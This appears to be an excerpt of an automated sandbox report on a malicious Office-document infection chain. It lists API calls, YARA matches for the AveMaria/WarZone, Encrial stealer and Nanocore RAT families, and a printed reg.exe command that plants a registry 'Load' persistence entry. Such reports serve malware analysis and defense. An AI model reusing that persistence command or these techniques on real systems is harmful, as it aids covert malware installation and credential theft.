Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFB455 wcstoul,GetPrivateProfileStringW,WritePrivateProfileStringW,wcstoul,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtQueryValueKey,RtlInitUnicodeString,NtQueryValueKey,RtlInitUnicodeString,NtQueryValueKey,wcstol,RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose, 25_2_03BFB455
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFABCC RtlInitUnicodeString,NtClose,RtlInitUnicodeString,NtOpenKey,NtEnumerateKey,RtlUnicodeStringToInteger,RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,lstrcmpiW,NtEnumerateKey,NtClose, 25_2_03BFABCC
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB8B52 NtCallbackReturn, 25_2_03BB8B52
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB8AAB NtCallbackReturn, 25_2_03BB8AAB
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC7AD0 RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtQueryValueKey,NtClose,RtlNtStatusToDosError,SetLastError, 25_2_03BC7AD0
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDBA23 NtCallbackReturn, 25_2_03BDBA23
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BBAA6C memset,LoadLibraryExW,WideCharToMultiByte,GetProcAddress,FreeLibrary,NtCallbackReturn, 25_2_03BBAA6C
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC2A4C NtCallbackReturn, 25_2_03BC2A4C
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BCE9BC NtCallbackReturn, 25_2_03BCE9BC
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C009C4 GetCurrentThread,NtOpenThreadToken,GetCurrentProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap,NtClose, 25_2_03C009C4
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB99F4 NtCallbackReturn,RtlReleaseActivationContext, 25_2_03BB99F4
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C01533 ExitWindowsEx,SetLastError, 25_2_03C01533
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Windows\System32\rfxvmt.dll
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00402008 10_2_00402008
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00400DA7 10_2_00400DA7
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004020BA 10_2_004020BA
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00401621 10_2_00401621
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00400F1B 10_2_00400F1B
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_0040171C 10_2_0040171C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004047C8 10_2_004047C8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004047D8 10_2_004047D8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E21A1A 10_2_01E21A1A
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E27B88 10_2_01E27B88
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E27B77 10_2_01E27B77
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E27B41 10_2_01E27B41
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E21A7D 10_2_01E21A7D
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_04E6417C 10_2_04E6417C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00232008 11_2_00232008
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00230DBB 11_2_00230DBB
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002320BA 11_2_002320BA
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00231621 11_2_00231621
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00230F1B 11_2_00230F1B
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_0023171C 11_2_0023171C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002347C8 11_2_002347C8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002347D8 11_2_002347D8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00501A1A 11_2_00501A1A
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00501A7D 11_2_00501A7D
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00507B77 11_2_00507B77
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00507B88 11_2_00507B88
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_01FE417C 11_2_01FE417C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00262008 12_2_00262008
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00260DBB 12_2_00260DBB
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00262329 12_2_00262329
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002620BA 12_2_002620BA
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00261621 12_2_00261621
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_0026171C 12_2_0026171C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00260F1B 12_2_00260F1B
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002647C8 12_2_002647C8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002647D8 12_2_002647D8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00621A1A 12_2_00621A1A
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00621A7D 12_2_00621A7D
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00627B77 12_2_00627B77
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00627B88 12_2_00627B88
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_045B4197 12_2_045B4197
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00413279 16_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041DEAA 16_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00413279 17_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0041DEAA 17_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00413279 18_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0041DEAA 18_2_0041DEAA
Source: C:\ProgramData\images.exe Code function: 20_2_002D2008 20_2_002D2008
Source: C:\ProgramData\images.exe Code function: 20_2_002D0DBB 20_2_002D0DBB
Source: C:\ProgramData\images.exe Code function: 20_2_002D20BA 20_2_002D20BA
Source: C:\ProgramData\images.exe Code function: 20_2_002D1621 20_2_002D1621
Source: C:\ProgramData\images.exe Code function: 20_2_002D171C 20_2_002D171C
Source: C:\ProgramData\images.exe Code function: 20_2_002D0F1B 20_2_002D0F1B
Source: C:\ProgramData\images.exe Code function: 20_2_002D47C8 20_2_002D47C8
Source: C:\ProgramData\images.exe Code function: 20_2_002D47D8 20_2_002D47D8
Source: C:\ProgramData\images.exe Code function: 20_2_004D1A1A 20_2_004D1A1A
Source: C:\ProgramData\images.exe Code function: 20_2_004D1A7D 20_2_004D1A7D
Source: C:\ProgramData\images.exe Code function: 20_2_004D7B77 20_2_004D7B77
Source: C:\ProgramData\images.exe Code function: 20_2_004D7B88 20_2_004D7B88
Source: C:\ProgramData\images.exe Code function: 20_2_008B417C 20_2_008B417C
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00413279 25_2_00413279
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0041DEAA 25_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF72CE 25_2_03BF72CE
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BD9236 25_2_03BD9236
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BD0219 25_2_03BD0219
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDD200 25_2_03BDD200
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC914C 25_2_03BC914C
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BCF6BA 25_2_03BCF6BA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BD3643 25_2_03BD3643
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C0A5A4 25_2_03C0A5A4
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BD89A9 25_2_03BD89A9
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB69ED 25_2_03BB69ED
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 004036F7 appears 216 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 0040357C appears 93 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 004034D1 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 00411E88 appears 147 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 0040BC0D appears 42 times
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: String function: 004036F7 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: String function: 03BB6125 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: String function: 0040357C appears 31 times
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: String function: 00411E88 appears 49 times
PE file contains strange resources
Source: microA[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.12.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.16.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Spawns drivers
Source: unknown Driver loaded: C:\Windows\System32\drivers\rdpdr.sys
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Yara signature match
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2100943704.0000000000360000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.2099841469.0000000000390000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2368726413.0000000002502000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000024.00000002.2374416119.0000000003777000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: microA[1].exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.10.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.11.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microA.exe.12.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: images.exe.16.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@44/32@14/2
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 16_2_00410B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 17_2_00410B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 18_2_00410B38
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges, 25_2_00410B38
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 16_2_0041405F
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize, 16_2_004148B6
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA, 16_2_00415169
